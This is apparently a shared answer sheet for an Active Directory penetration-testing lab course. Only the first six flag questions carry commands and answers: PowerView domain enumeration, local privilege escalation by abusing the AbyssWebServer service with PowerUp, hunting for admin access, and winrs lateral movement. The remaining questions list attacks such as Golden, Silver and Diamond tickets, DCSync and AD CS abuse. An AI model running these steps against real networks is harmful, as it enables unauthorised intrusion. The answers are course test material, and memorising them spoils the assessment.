
Flag Verification

Uploaded by

lordhades0970
1. Learning Objective - 1 Student VM SID of the member of the Enterprise Admins group
~> Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

#Answer: S-1-5-21-335606122-960912869-3279953914-500

2. Learning Objective - 2 Student VM Display name of the GPO applied on StudentMachines OU
~> (Get-DomainOU -Identity StudentMachines).gplink
~> Get-DomainGPO -Identity '{XXXXXXX}'

#Answer: Students

3. Learning Objective - 3 Student VM ActiveDirectory Rights for RDPUsers group on the users named ControlxUser
~> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
~> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

#Answer: GenericAll

4. Learning Objective - 4 Student VM Trust Direction for the trust between dollarcorp.moneycorp.local and eurocorp.local
~> Get-ForestDomain -Verbose
~> Get-DomainTrust

#Answer: TrustDirection : Bidirectional

5. Learning Objective - 5 Student VM Service abused on the student VM for local privilege escalation
~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~> . C:\AD\Tools\PowerUp.ps1
~> Invoke-AllChecks
~> Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student729' -Verbose
#(log out and back in)
#Answer: AbyssWebServer
#Run cmd as admin after logging out
~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
~> Find-PSRemotingLocalAdminAccess
#Answer: Find-PSRemotingLocalAdminAccess
#Answer: dcorp-std729
dcorp-adminsrv
#So we have access on dcorp-adminsrv; connect with:
~> winrs -r:dcorp-adminsrv cmd
~> set username
~> set computername

6. Learning Objective - 5 Student VM Script used for hunting for admin privileges using PowerShell Remoting
~>
~>
~>

#Answer: Find-PSRemotingLocalAdminAccess

7. Learning Objective - 5 dcorp-ci Jenkins user used to access Jenkins web console

8. Learning Objective - 5 dcorp-ci Domain user used for running Jenkins service on dcorp-ci

9. Learning Objective - 6 Student VM CollectionMethod in BloodHound that covers all the collection methods

10. Learning Objective - 7 dcorp-mgmt Process using svcadmin as service account

11. Learning Objective - 7 dcorp-mgmt NTLM hash of svcadmin account

12. Learning Objective - 7 dcorp-mgmt We tried to extract clear-text credentials for scheduled tasks from? Flag value is like lsass, registry, credential vault etc.

13. Learning Objective - 7 dcorp-adminsrv NTLM hash of srvadmin extracted from dcorp-adminsrv

14. Learning Objective - 7 dcorp-adminsrv NTLM hash of websvc extracted from dcorp-adminsrv

15. Learning Objective - 7 dcorp-adminsrv NTLM hash of appadmin extracted from dcorp-adminsrv

16. Learning Objective - 8 dcorp-dc NTLM hash of krbtgt

17. Learning Objective - 8 dcorp-dc NTLM hash of domain administrator - Administrator

18. Learning Objective - 9 dcorp-dc The service whose Silver Ticket can be used for winrs or PowerShell Remoting

19. Learning Objective - 10 dcorp-dc Name of the account whose secrets are used for the Diamond Ticket attack

20. Learning Objective - 11 dcorp-dc Name of the Registry key modified to change Logon behavior of DSRM administrator

21. Learning Objective - 12 dcorp-dc Attack that can be executed with Replication rights (no DA privileges required)

22. Learning Objective - 13 dcorp-dc SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID)

23. Learning Objective - 14 dcorp-dc SPN for which a TGS is requested

24. Learning Objective - 15 dcorp-appsrv Domain user who is a local admin on dcorp-appsrv

25. Learning Objective - 15 dcorp-appsrv Which user's credentials are compromised by using the printer bug for compromising dollarcorp

26. Learning Objective - 16 dcorp-adminsrv Value of msds-allowedtodelegateto attribute of dcorp-adminsrv

27. Learning Objective - 16 dcorp-adminsrv Alternate service accessed on dcorp-dc by abusing Constrained delegation on dcorp-adminsrv

28. Learning Objective - 17 dcorp-dc Computer account on which ciadmin can configure Resource-based Constrained Delegation

29. Learning Objective - 18 Student VM SID history injected to escalate to Enterprise Admins

30. Learning Objective - 19 mcorp-dc NTLM hash of krbtgt of moneycorp.local

31. Learning Objective - 20 eurocorp-dc Service for which a TGS is requested from eurocorp-dc

32. Learning Objective - 20 eurocorp-dc Contents of secret.txt on eurocorp-dc

33. Learning Objective - 21 dcorp-dc Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT

34. Learning Objective - 21 dcorp-dc Name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users

35. Learning Objective - 21 dcorp-dc Name of the CA attribute that allows requestor to provide Subject Alternative Names

36. Learning Objective - 21 dcorp-dc Name of the group that has enrollment rights on the CA-Integration template

37. Learning Objective - 22 dcorp-mssql First SQL Server linked to dcorp-mssql

38. Learning Objective - 22 dcorp-mssql Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt

39. Learning Objective - 22 dcorp-mssql SQL Server privileges on eu-sql

40. Learning Objective - 22 dcorp-mssql Privileges on operating system of eu-sql
